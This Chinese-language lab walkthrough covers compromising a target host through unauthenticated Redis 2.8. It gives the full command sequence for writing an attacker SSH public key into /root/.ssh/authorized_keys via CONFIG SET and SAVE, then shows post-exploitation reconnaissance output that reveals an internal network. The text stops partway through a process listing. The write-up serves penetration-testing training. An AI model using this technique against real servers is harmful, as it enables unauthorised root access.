一、靶场相关信息
二、信息搜集
TCP 端口扫描 + 指纹识别 + 操作系统识别:
bash
sudo rustscan -a 192.168.111.20 -r 1-65535 -- -sV -O -Pn -n -oA TCP_PORTS_NAMP输出(仅列举部分):
bash
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
81/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
6379/tcp open redis syn-ack ttl 63 Redis key-value store 2.8.17关机信息:
- OS:Ubuntu
- 6379 端口:年代久远,默认配置下极大概率存在未授权访问
UDP 端口扫描 + 指纹识别:
bash
sudo nmap -sV -sU --top-ports 20 192.168.111.20 -Pn -n -oA UDP_TOP20_PORTS从扫描结果上看,端口状态要么是 closed 要么是 open|filtered,并没有提供很大价值的信息。
思路:先处理 TCP 端口,若 TCP 端口没有突破,则回到 UDP 端口,用特定的工具进行扫描。
综合上述信息,目前最优先考虑的就是 6379 端口,其次是 80 和 81 这两个 http 服务。
三、Redis 未授权访问
Redis 在 2.8 这样的老版本里:
- 默认监听地址是 0.0.0.0(对所有网络接口开放)
- 没有设置密码(requirepass 为空)
- protected-mode 这个保护机制是 3.2 版本以后才引入的,2.8 完全没有这个功能。
- 靶场环境通常不会额外加固防火墙或配置
protected-mode 是 Redis 从 3.2 版本开始引入的一个默认安全保护机制。简单说,它的作用是:当 Redis 没有设置密码(requirepass 为空),也没有明确绑定只允许本地访问(bind 127.0.0.1)的时候,就自动把外部网络的连接全部拒绝,只允许本机(localhost)连进来。
尝试无密码登入:
bash
redis-cli -h 192.168.111.20 -p 6379登入成功:
简单做一下信息搜集,使用了下述命令:
- ping:用于测试是否是真的连接上了
- info:Redis 版本、OS、内存、已连接客户端数等信息
- client list:所有已连接客户端的 IP 和端口
- config get dbfilename:当前 RDB 文件名
- config get dir:当前 RDB 持久化目录
关键信息:
redis_version:2.8.17
os:Linux 5.4.0-66-generic x86_64
dbfilename dump.rdb
dir /root
rdb_last_save_time:1775801194
rdb_last_bgsave_status:okRDB 的持久化目录被设置成 /root,并且根据 rdb_last_save_time 和 rdb_last_bgsave_status 可以推断出它不仅指定了该目录,还成功写进去了。
而我们知道,/root 目录的权限是 700,即只有 root 用户才有写权限。
因此,我们可以确认,当前的 Redis 是 root 权限下运行的。
根据之前端口扫描看到的 22 端口开放,于是通过 redis 写入 ssh 公钥 \\to ssh 连接就是目前的首要目标。
现在 kali 上生成 ssh 密钥对:
bash
ssh-keygen -t rsa -f ./target读取公钥内容:
❯ cat target.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali回到 redis 中,将公钥内容写入:
bash
SET pubkey "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali\n\n"设置目录:
CONFIG SET dir /root/.ssh/设置保存文件名:
CONFIG SET dbfilename authorized_keys
SAVE注意:Redis 通过 CONFIG SET dir + dbfilename 再执行 SAVE 的方式,是覆盖式写入,它会生成一个全新的 RDB 二进制快照文件,直接把目标文件(这里是 /root/.ssh/authorized_keys)从头替换掉,而不是在原有内容后面追加。而上面在公钥前面加 \n 换行符的目的在于,RDB 文件的格式是二进制的,即文件最开头固定会有"REDIS"魔术字符串加上版本号、元数据等一堆二进制垃圾数据,然后才是你 SET 进去的 pubkey 内容。如果不加换行,公钥字符串就会直接粘在这些二进制垃圾后面,形成类似"[二进制乱码]ssh-rsa AAA..."这样的一长行,sshd 在解析 authorized_keys 时就会把它当成无效行而直接忽略,导致公钥无法生效。
尝试 ssh 登入:
bash
ssh root@192.168.111.20 -i ./target
登入成功。
四、Ubuntu 信息搜集
先用原生命令做一下信息搜集:
bash
root@ubuntu:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b1:41:a3 brd ff:ff:ff:ff:ff:ff
inet 192.168.111.20/24 brd 192.168.111.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:41a3/64 scope link
valid_lft forever preferred_lft forever
3: ens38: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b1:f7:eb brd ff:ff:ff:ff:ff:ff
inet 192.168.52.10/24 brd 192.168.52.255 scope global ens38
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:f7eb/64 scope link
valid_lft forever preferred_lft forever双网卡:
- 外网:192.168.111.20
- 内网:192.168.52.10
- 内网网段:192.168.52.0/24
bash
root@ubuntu:~# cat /proc/version
Linux version 5.4.0-66-generic (buildd@lgw01-amd64-016) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021
root@ubuntu:~# cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
bash
root@ubuntu:~# hostname && cat /etc/issue && uname -a && cat /etc/hostsubuntu
Ubuntu 18.04.5 LTS \n \l
Linux ubuntu 5.4.0-66-generic #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
127.0.0.1 localhost
127.0.1.1 ubuntu
47.101.57.72 whoamianony.top
127.0.0.1 www.whopen.com
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters路由信息:
root@ubuntu:~# ip route show
192.168.52.0/24 dev ens38 proto kernel scope link src 192.168.52.10
192.168.111.0/24 dev ens33 proto kernel scope link src 192.168.111.20 说明直连内网环境。
查看 ARP 缓存:
bash
root@ubuntu:~# ip neigh
192.168.52.20 dev ens38 lladdr 00:50:56:b1:7e:66 STALE
192.168.111.25 dev ens33 lladdr 00:50:56:b1:87:ea REACHABLE直接发现了新的一台内网主机(192.168.52.20):
查看所有进程:
root@ubuntu:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 159932 9172 ? Ss Apr09 0:02 /sbin/init auto noprompt
root 2 0.0 0.0 0 0 ? S Apr09 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< Apr09 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< Apr09 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< Apr09 0:00 [kworker/0:0H-kb]
root 9 0.0 0.0 0 0 ? I< Apr09 0:00 [mm_percpu_wq]
root 10 0.0 0.0 0 0 ? S Apr09 0:00 [ksoftirqd/0]
root 11 0.0 0.0 0 0 ? I Apr09 0:01 [rcu_sched]
root 12 0.0 0.0 0 0 ? S Apr09 0:00 [migration/0]
root 13 0.0 0.0 0 0 ? S Apr09 0:00 [idle_inject/0]
root 14 0.0 0.0 0 0 ? S Apr09 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S Apr09 0:00 [cpuhp/1]
root 16 0.0 0.0 0 0 ? S Apr09 0:00 [idle_inject/1]
root 17 0.0 0.0 0 0 ? S Apr09 0:00 [migration/1]
root 18 0.0 0.0 0 0 ? S Apr09 0:00 [ksoftirqd/1]
root 20 0.0 0.0 0 0 ? I< Apr09 0:00 [kworker/1:0H-kb]
root 21 0.0 0.0 0 0 ? S Apr09 0:00 [kdevtmpfs]
root 22 0.0 0.0 0 0 ? I< Apr09 0:00 [netns]
root 23 0.0 0.0 0 0 ? S Apr09 0:00 [rcu_tasks_kthre]
root 24 0.0 0.0 0 0 ? S Apr09 0:00 [kauditd]
root 26 0.0 0.0 0 0 ? S Apr09 0:00 [khungtaskd]
root 27 0.0 0.0 0 0 ? S Apr09 0:00 [oom_reaper]
root 28 0.0 0.0 0 0 ? I< Apr09 0:00 [writeback]
root 29 0.0 0.0 0 0 ? S Apr09 0:00 [kcompactd0]
root 30 0.0 0.0 0 0 ? SN Apr09 0:00 [ksmd]
root 31 0.0 0.0 0 0 ? SN Apr09 0:00 [khugepaged]
root 36 0.0 0.0 0 0 ? I Apr09 0:02 [kworker/1:1-eve]
root 78 0.0 0.0 0 0 ? I< Apr09 0:00 [kintegrityd]
root 79 0.0 0.0 0 0 ? I< Apr09 0:00 [kblockd]
root 80 0.0 0.0 0 0 ? I< Apr09 0:00 [blkcg_punt_bio]
root 82 0.0 0.0 0 0 ? I< Apr09 0:00 [tpm_dev_wq]
root 83 0.0 0.0 0 0 ? I< Apr09 0:00 [ata_sff]
root 84 0.0 0.0 0 0 ? I< Apr09 0:00 [md]
root 85 0.0 0.0 0 0 ? I< Apr09 0:00 [edac-poller]
root 86 0.0 0.0 0 0 ? I< Apr09 0:00 [devfreq_wq]
root 87 0.0 0.0 0 0 ? S Apr09 0:00 [watchdogd]
root 90 0.0 0.0 0 0 ? S Apr09 0:00 [kswapd0]
root 91 0.0 0.0 0 0 ? S Apr09 0:00 [ecryptfs-kthrea]
root 93 0.0 0.0 0 0 ? I< Apr09 0:00 [kthrotld]
root 94 0.0 0.0 0 0 ? S Apr09 0:00 [irq/24-pciehp]
root 95 0.0 0.0 0 0 ? S Apr09 0:00 [irq/25-pciehp]
root 96 0.0 0.0 0 0 ? S Apr09 0:00 [irq/26-pciehp]
root 97 0.0 0.0 0 0 ? S Apr09 0:00 [irq/27-pciehp]
root 98 0.0 0.0 0 0 ? S Apr09 0:00 [irq/28-pciehp]
root 99 0.0 0.0 0 0 ? S Apr09 0:00 [irq/29-pciehp]
root 100 0.0 0.0 0 0 ? S Apr09 0:00 [irq/30-pciehp]
root 101 0.0 0.0 0 0 ? S Apr09 0:00 [irq/31-pciehp]
root 102 0.0 0.0 0 0 ? S Apr09 0:00 [irq/32-pciehp]
root 103 0.0 0.0 0 0 ? S Apr09 0:00 [irq/33-pciehp]
root 104 0.0 0.0 0 0 ? S Apr09 0:00 [irq/34-pciehp]
root 105 0.0 0.0 0 0 ? S Apr09 0:00 [irq/35-pciehp]
root 106 0.0 0.0 0 0 ? S Apr09 0:00 [irq/36-pciehp]
root 107 0.0 0.0 0 0 ? S Apr09 0:00 [irq/37-pciehp]
root 108 0.0 0.0 0 0 ? S Apr09 0:00 [irq/38-pciehp]
root 109 0.0 0.0 0 0 ? S Apr09 0:00 [irq/39-pciehp]
root 110 0.0 0.0 0 0 ? S Apr09 0:00 [irq/40-pciehp]
root 111 0.0 0.0 0 0 ? S Apr09 0:00 [irq/41-pciehp]
root 112 0.0 0.0 0 0 ? S Apr09 0:00 [irq/42-pciehp]
root 113 0.0 0.0 0 0 ? S Apr09 0:00 [irq/43-pciehp]
root 114 0.0 0.0 0 0 ? S Apr09 0:00 [irq/44-pciehp]
root 115 0.0 0.0 0 0 ? S Apr09 0:00 [irq/45-pciehp]
root 116 0.0 0.0 0 0 ? S Apr09 0:00 [irq/46-pciehp]
root 117 0.0 0.0 0 0 ? S Apr09 0:00 [irq/47-pciehp]
root 118 0.0 0.0 0 0 ? S Apr09 0:00 [irq/48-pciehp]
root 119 0.0 0.0 0 0 ? S Apr09 0:00 [irq/49-pciehp]
root 120 0.0 0.0 0 0 ? S Apr09 0:00 [irq/50-pciehp]
root 121 0.0 0.0 0 0 ? S Apr09 0:00 [irq/51-pciehp]
root 122 0.0 0.0 0 0 ? S Apr09 0:00 [irq/52-pciehp]
root 123 0.0 0.0 0 0 ? S Apr09 0:00 [irq/53-pciehp]
root 124 0.0 0.0 0 0 ? S Apr09 0:00 [irq/54-pciehp]
root 125 0.0 0.0 0 0 ? S Apr09 0:00 [irq/55-pciehp]
root 126 0.0 0.0 0 0 ? I< Apr09 0:00 [acpi_thermal_pm]
root 127 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_0]
root 128 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_0]
root 129 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_1]
root 130 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_1]
root 132 0.0 0.0 0 0 ? I< Apr09 0:00 [vfio-irqfd-clea]
root 133 0.0 0.0 0 0 ? I< Apr09 0:00 [ipv6_addrconf]
root 143 0.0 0.0 0 0 ? I< Apr09 0:00 [kstrp]
root 146 0.0 0.0 0 0 ? I< Apr09 0:00 [kworker/u257:0]
root 159 0.0 0.0 0 0 ? I< Apr09 0:00 [charger_manager]
root 220 0.0 0.0 0 0 ? I< Apr09 0:00 [mpt_poll_0]
root 221 0.0 0.0 0 0 ? I< Apr09 0:00 [mpt/0]
root 222 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_2]
root 223 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_2]
root 224 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_3]
root 225 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_3]
root 226 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_4]
root 227 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_4]
root 228 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_5]
root 229 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_5]
root 230 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_6]
root 231 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_6]
root 232 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_7]
root 233 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_7]
root 234 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_8]
root 235 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_8]
root 236 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_9]
root 237 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_9]
root 238 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_10]
root 239 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_10]
root 240 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_11]
root 241 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_11]
root 242 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_12]
root 243 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_12]
root 244 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_13]
root 245 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_13]
root 246 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_14]
root 247 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_14]
root 248 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_15]
root 249 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_15]
root 250 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_16]
root 251 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_16]
root 252 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_17]
root 253 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_17]
root 254 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_18]
root 255 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_18]
root 256 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_19]
root 257 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_19]
root 258 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_20]
root 259 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_20]
root 260 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_21]
root 261 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_21]
root 262 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_22]
root 263 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_22]
root 264 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_23]
root 265 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_23]
root 266 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_24]
root 267 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_24]
root 268 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_25]
root 269 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_25]
root 270 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_26]
root 271 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_26]
root 272 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_27]
root 273 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_27]
root 274 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_28]
root 275 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_28]
root 276 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_29]
root 277 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_29]
root 278 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_30]
root 279 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_30]
root 280 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_31]
root 282 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_31]
root 310 0.0 0.0 0 0 ? S Apr09 0:00 [scsi_eh_32]
root 311 0.0 0.0 0 0 ? I< Apr09 0:00 [scsi_tmf_32]
root 312 0.0 0.0 0 0 ? I< Apr09 0:00 [kworker/0:1H-kb]
root 314 0.0 0.0 0 0 ? I< Apr09 0:00 [kworker/1:1H-kb]
root 334 0.0 0.0 0 0 ? S Apr09 0:00 [jbd2/sda1-8]
root 335 0.0 0.0 0 0 ? I< Apr09 0:00 [ext4-rsv-conver]
root 367 0.0 0.2 78604 11316 ? S<s Apr09 0:00 /lib/systemd/systemd-journald
root 393 0.0 0.0 0 0 ? I Apr09 0:01 [kworker/0:3-cgr]
root 394 0.0 0.0 0 0 ? S< Apr09 0:00 [loop0]
root 398 0.0 0.0 0 0 ? S< Apr09 0:00 [loop1]
root 399 0.0 0.0 0 0 ? S Apr09 0:00 [irq/16-vmwgfx]
root 400 0.0 0.0 0 0 ? I< Apr09 0:00 [ttm_swap]
root 403 0.0 0.0 0 0 ? S< Apr09 0:00 [loop2]
root 409 0.0 0.0 0 0 ? S< Apr09 0:00 [loop3]
root 410 0.0 0.0 0 0 ? S< Apr09 0:00 [loop4]
root 412 0.0 0.0 0 0 ? S< Apr09 0:00 [loop5]
root 413 0.0 0.0 0 0 ? S< Apr09 0:00 [loop6]
root 417 0.0 0.0 0 0 ? S< Apr09 0:00 [loop7]
root 423 0.0 0.2 49944 8004 ? Ss Apr09 0:00 /lib/systemd/systemd-udevd
root 432 0.0 0.0 0 0 ? S< Apr09 0:00 [loop8]
root 442 0.0 0.0 0 0 ? S< Apr09 0:00 [loop9]
root 469 0.0 0.0 0 0 ? S< Apr09 0:00 [loop10]
root 472 0.0 0.0 158792 300 ? Ssl Apr09 0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_per
root 483 0.0 0.0 0 0 ? S< Apr09 0:00 [loop11]
root 487 0.0 0.0 0 0 ? S< Apr09 0:00 [loop12]
root 488 0.0 0.0 0 0 ? S< Apr09 0:00 [loop13]
systemd+ 501 0.0 0.1 72020 5408 ? Ss Apr09 0:00 /lib/systemd/systemd-networkd
root 502 0.0 0.0 0 0 ? S< Apr09 0:00 [loop14]
root 504 0.0 0.0 0 0 ? S< Apr09 0:00 [loop15]
root 514 0.0 0.0 0 0 ? S< Apr09 0:00 [loop16]
root 515 0.0 0.0 0 0 ? S< Apr09 0:00 [loop17]
systemd+ 521 0.0 0.1 70664 5304 ? Ss Apr09 0:00 /lib/systemd/systemd-resolved
systemd+ 522 0.0 0.0 146136 3436 ? Ssl Apr09 0:00 /lib/systemd/systemd-timesyncd
root 563 0.0 0.2 98268 10736 ? Ss Apr09 0:00 /usr/bin/VGAuthService
root 567 0.0 0.1 235424 7196 ? S<sl Apr09 0:02 /usr/bin/vmtoolsd
root 603 0.0 0.2 308544 8812 ? Ssl Apr09 0:00 /usr/lib/accountsservice/accounts-daemon
root 614 0.0 0.9 1849372 38504 ? Ssl Apr09 0:02 /usr/lib/snapd/snapd
root 616 0.0 0.2 434320 9216 ? Ssl Apr09 0:00 /usr/sbin/ModemManager --filter-policy=strict
root 618 0.0 0.1 70732 6136 ? Ss Apr09 0:00 /lib/systemd/systemd-logind
root 621 0.0 0.0 38432 3224 ? Ss Apr09 0:00 /usr/sbin/cron -f
message+ 623 0.0 0.1 51340 5564 ? Ss Apr09 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --system
root 646 0.0 0.1 46496 5052 ? Sl Apr09 0:03 redis-server *:6379
root 680 0.0 0.0 0 0 ? I< Apr09 0:00 [cryptd]
syslog 771 0.0 0.1 263040 4932 ? Ssl Apr09 0:00 /usr/sbin/rsyslogd -n
avahi 773 0.0 0.0 47288 3708 ? Ss Apr09 0:00 avahi-daemon: running [ubuntu.local]
root 775 0.0 0.3 517616 12432 ? Ssl Apr09 0:00 /usr/lib/udisks2/udisksd
root 779 0.0 0.0 4556 788 ? Ss Apr09 0:00 /usr/sbin/acpid
root 782 0.0 0.4 428608 17968 ? Ssl Apr09 0:00 /usr/sbin/NetworkManager --no-daemon
root 783 0.0 0.0 110552 2116 ? Ssl Apr09 0:00 /usr/sbin/irqbalance --foreground
root 790 0.0 0.1 45236 5316 ? Ss Apr09 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root 794 0.0 0.4 177644 17132 ? Ssl Apr09 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 859 0.0 0.2 311328 10960 ? Ssl Apr09 0:00 /usr/lib/policykit-1/polkitd --no-debug
avahi 884 0.0 0.0 47080 340 ? S Apr09 0:00 avahi-daemon: chroot helper
root 949 0.0 0.4 194356 19904 ? Ssl Apr09 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --
root 970 0.0 0.1 308060 7444 ? Ssl Apr09 0:00 /usr/sbin/gdm3
root 973 0.0 0.1 72304 5688 ? Ss Apr09 0:00 /usr/sbin/sshd -D
whoopsie 975 0.0 0.3 394992 12960 ? Ssl Apr09 0:00 /usr/bin/whoopsie -f
kernoops 987 0.0 0.0 56944 424 ? Ss Apr09 0:00 /usr/sbin/kerneloops --test
kernoops 989 0.0 0.0 56944 2544 ? Ss Apr09 0:00 /usr/sbin/kerneloops
root 990 0.0 0.2 261556 8052 ? Sl Apr09 0:00 gdm-session-worker [pam/gdm-launch-environment]
root 1022 0.0 0.0 141128 1580 ? Ss Apr09 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 1023 0.0 0.1 143772 6460 ? S Apr09 0:00 nginx: worker process
www-data 1024 0.0 0.1 143772 6460 ? S Apr09 0:00 nginx: worker process
gdm 1027 0.0 0.2 76944 8052 ? Ss Apr09 0:00 /lib/systemd/systemd --user
gdm 1028 0.0 0.0 114076 2628 ? S Apr09 0:00 (sd-pam)
gdm 1095 0.0 0.1 197800 5444 tty1 Ssl+ Apr09 0:00 /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/gre
gdm 1097 0.0 0.1 50248 4612 ? Ss Apr09 0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --syste
gdm 1099 0.0 0.3 567040 15432 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter
gdm 1133 0.0 3.5 3352992 140300 tty1 Sl+ Apr09 0:03 /usr/bin/gnome-shell
root 1140 0.0 0.2 322316 8560 ? Ssl Apr09 0:00 /usr/lib/upower/upowerd
gdm 1152 0.0 1.3 589012 55568 tty1 Sl+ Apr09 0:00 /usr/bin/Xwayland :1024 -rootless -terminate -accessx -core -listen 4 -listen
gdm 1159 0.0 0.2 365592 8300 ? Ssl Apr09 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
gdm 1164 0.0 0.0 49932 3732 ? S Apr09 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.c
gdm 1166 0.0 0.1 220768 7116 ? Sl Apr09 0:00 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
gdm 1170 0.0 0.3 1243832 12628 ? Ssl Apr09 0:00 /usr/bin/pulseaudio --daemonize=no
rtkit 1171 0.0 0.0 183512 2996 ? SNsl Apr09 0:00 /usr/lib/rtkit/rtkit-daemon
gdm 1183 0.0 0.2 375260 9612 tty1 Sl Apr09 0:00 ibus-daemon --xim --panel disable
gdm 1186 0.0 0.1 294488 7940 tty1 Sl Apr09 0:00 /usr/lib/ibus/ibus-dconf
gdm 1189 0.0 1.2 515080 48472 tty1 Sl Apr09 0:00 /usr/lib/ibus/ibus-x11 --kill-daemon
gdm 1193 0.0 0.2 292432 8056 ? Sl Apr09 0:00 /usr/lib/ibus/ibus-portal
gdm 1199 0.0 0.1 271564 5208 ? Ssl Apr09 0:00 /usr/libexec/xdg-permission-store
root 1204 0.0 0.2 315240 8952 ? Ssl Apr09 0:00 /usr/lib/x86_64-linux-gnu/boltd
gdm 1209 0.0 1.2 663504 49604 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-xsettings
root 1210 0.0 0.3 382424 14112 ? Ssl Apr09 0:00 /usr/lib/packagekit/packagekitd
gdm 1216 0.0 0.2 294476 8064 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-a11y-settings
gdm 1217 0.0 1.1 514708 47928 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-clipboard
gdm 1220 0.0 1.2 827792 49900 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-color
gdm 1221 0.0 0.3 393720 13816 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-datetime
gdm 1222 0.0 0.1 283744 5332 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-housekeeping
gdm 1223 0.0 1.2 675508 49180 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-keyboard
gdm 1227 0.0 1.2 1185244 50872 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-media-keys
gdm 1228 0.0 0.1 202000 4536 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-mouse
gdm 1231 0.0 1.2 686292 49892 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-power
gdm 1237 0.0 0.2 267016 8712 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-print-notifications
gdm 1238 0.0 0.1 202020 4520 tty1 Sl+ Apr09 0:00 /usr/lib/gnome-settings-daemon/gsd-rfkill
